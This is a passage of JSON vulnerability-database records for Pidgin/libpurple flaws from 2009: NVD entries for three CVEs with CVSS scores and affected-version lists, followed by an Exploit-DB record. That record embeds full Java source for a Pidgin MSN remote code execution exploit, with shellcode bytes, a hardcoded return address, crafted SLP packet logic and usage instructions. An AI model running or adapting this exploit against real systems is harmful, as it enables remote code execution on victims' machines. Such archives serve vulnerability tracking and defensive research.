"cpe:2.3:a:pidgin:pidgin:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.2:*:linux:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:01", "description": "Buffer overflow in the XMPP SOCKS5 bytestream server in Pidgin (formerly Gaim) before 2.5.6 allows remote authenticated users to execute arbitrary code via vectors involving an outbound XMPP file transfer. NOTE: some of these details are obtained from third party information.", "edition": 6, "cvss3": {}, "published": "2009-05-26T15:30:00", "title": "CVE-2009-1373", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.1, "vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1373"], "modified": "2017-09-29T01:34:00", "cpe": ["cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2009-1373", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1373", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:pidgin:pidgin:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.2:*:linux:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:04", "description": "The msn_slplink_process_msg function in libpurple/protocols/msn/slplink.c in libpurple, as used in Pidgin (formerly Gaim) before 2.5.9 and Adium 1.3.5 and earlier, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) by sending multiple crafted SLP (aka MSNSLP) messages to trigger an overwrite of an arbitrary memory location. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2009-1376.", "edition": 6, "cvss3": {}, "published": "2009-08-21T11:02:00", "title": "CVE-2009-2694", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2694"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:adium:adium:1.3.1", "cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.7", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:adium:adium:1.3.4", "cpe:/a:adium:adium:1.3.3", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.5.8", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:adium:adium:1.2.7", "cpe:/a:adium:adium:1.3.5", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:adium:adium:1.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.6", "cpe:/a:adium:adium:1.3.2", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2009-2694", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2694", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:pidgin:pidgin:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:01", "description": "The PurpleCircBuffer implementation in Pidgin (formerly Gaim) before 2.5.6 does not properly maintain a certain buffer, which allows remote attackers to cause a denial of service (memory corruption and application crash) via vectors involving the (1) XMPP or (2) Sametime protocol.", "edition": 6, "cvss3": {}, "published": "2009-05-26T15:30:00", "title": "CVE-2009-1375", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1375"], "modified": "2017-09-29T01:34:00", "cpe": ["cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2009-1375", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1375", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:pidgin:pidgin:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.2:*:linux:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T10:59:54", "description": "Pidgin MSN <= 2.5.8 Remote Code Execution Exploit. CVE-2009-1376,CVE-2009-2694. Remote exploit for windows platform", "published": "2009-09-09T00:00:00", "type": "exploitdb", "title": "Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1376", "CVE-2009-2694"], "modified": "2009-09-09T00:00:00", "id": "EDB-ID:9615", "href": "https://www.exploit-db.com/exploits/9615/", "sourceData": "/*\n* Pidgin MSN <= 2.5.8 Remote Code Execution\n*\n* Pierre Nogues - pierz@hotmail.it\n* http://www.indahax.com/\n*\n*\n* Description:\n* Pidgin is a multi-protocol Instant Messenger.\n*\n* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].\n* The library \"libmsn\" used by pidgin doesn't handle specially crafted MsnSlp packets\n* which could lead to memory corruption.\n*\n* Affected versions :\n* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.\n*\n* Plateforms :\n* Windows, Linux, Mac\n*\n* Fix :\n* Fixed in Pidgin 2.5.9\n* Update to the latest version : http://www.pidgin.im/download/\n*\n* References :\n* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\n* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write\n* [3] http://www.pidgin.im/news/security/?id=34\n*\n* Usage :\n* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/\n* javac.exe -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PidginExploit.java\n* java -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\n*\n*/\n\nimport net.sf.jml.*;\nimport net.sf.jml.event.*;\nimport net.sf.jml.impl.*;\nimport net.sf.jml.message.p2p.*;\nimport net.sf.jml.util.*;\n\npublic class PidginExploit {\n\n private MsnMessenger messenger;\n private String login;\n private String password;\n private String target;\n\n private int session_id = NumberUtils.getIntRandom();\n\n private byte shellcode[] = new byte[] {\n\n /*\n * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !\n * sub esp,500\n */\n (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,\n\n\n /*\n * windows/exec - 121 bytes\n * http://www.metasploit.com\n * EXITFUNC=process, CMD=calc.exe\n */\n (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,\n (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,\n (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,\n (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,\n (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,\n (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,\n (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,\n (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,\n (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,\n (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,\n (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,\n (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,\n (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,\n (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,\n (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,\n (byte) 0x00\n };\n\n // reteip = pointer to the return address in the stack\n // The shellcode will be wrote just before reteip\n // and reteip will automaticly point to the shellcode. It's magic !\n private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8\n\n private int neweip;\n private byte[] payload = new byte[shellcode.length + 4];\n private int totallength = reteip + 4;\n\n public static void main(String[] args) throws Exception {\n\n if(args.length != 3){\n System.out.println(\"PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\");\n }else{\n PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);\n exploit.start();\n }\n\n }\n\n public PidginExploit(String login, String password, String target){\n this.login = login;\n this.password = password;\n this.target = target;\n\n neweip = reteip - shellcode.length ;\n\n for(int i=0;i<shellcode.length;i++)\n payload[i] = shellcode[i];\n\n payload[shellcode.length] = (byte)(neweip & 0x000000FF);\n payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);\n payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);\n payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);\n }\n\n public void start() {\n messenger = MsnMessengerFactory.createMsnMessenger(login,password);\n messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);\n\n messenger.setLogIncoming(false);\n messenger.setLogOutgoing(false);\n\n initMessenger(messenger);\n messenger.login();\n }\n\n protected void initMessenger(MsnMessenger messenger) {\n\n messenger.addContactListListener(new MsnContactListAdapter() {\n\n public void contactListInitCompleted(MsnMessenger messenger) {\n\n final Object id = new Object();\n\n messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {\n\n public void switchboardStarted(MsnSwitchboard switchboard) {\n\n if (id != switchboard.getAttachment())\n return;\n\n switchboard.inviteContact(Email.parseStr(target));\n }\n\n public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {\n if (id != switchboard.getAttachment())\n return;\n\n MsnP2PSlpMessage msg = new MsnP2PSlpMessage();\n msg.setIdentifier(NumberUtils.getIntRandom());\n msg.setSessionId(session_id);\n msg.setOffset(0);\n msg.setTotalLength(totallength);\n msg.setCurrentLength(totallength);\n\n // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null\n // We'll use this buffer to rewrite memory in the stack\n msg.setFlag(0x1000020);\n\n msg.setP2PDest(target);\n\n switchboard.sendMessage(msg);\n\n System.out.println(\"First packet sent, waiting for the ACK\");\n\n }\n\n public void switchboardClosed(MsnSwitchboard switchboard) {\n System.out.println(\"switchboardClosed\");\n switchboard.getMessenger().removeSwitchboardListener(this);\n }\n\n public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){\n System.out.println(\"contactLeaveSwitchboard\");\n }\n });\n messenger.newSwitchboard(id);\n }\n });\n\n messenger.addMessageListener(new MsnMessageAdapter(){\n\n public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {\n\n //We receive the ACK of our first packet with the ID of the new bogus packet\n message.getIdentifier();\n\n MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,\n payload.length, payload, target);\n\n switchboard.sendMessage(msg);\n System.out.println(\"ACK received && Payload sent !\");\n System.out.println(\"Exploit OK ! CTRL+C to quit\");\n\n }\n });\n\n\n\n messenger.addMessengerListener(new MsnMessengerAdapter() {\n\n public void loginCompleted(MsnMessenger messenger) {\n System.out.println(messenger.getOwner().getEmail() + \" login\");\n }\n\n public void logout(MsnMessenger messenger) {\n System.out.println(messenger.getOwner().getEmail() + \" logout\");\n }\n\n public void exceptionCaught(MsnMessenger messenger,\n Throwable throwable) {\n System.out.println(\"caught exception: \" + throwable);\n }\n });\n\n }\n}\n\n// milw0rm.com [2009-09-09]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9615/"}]}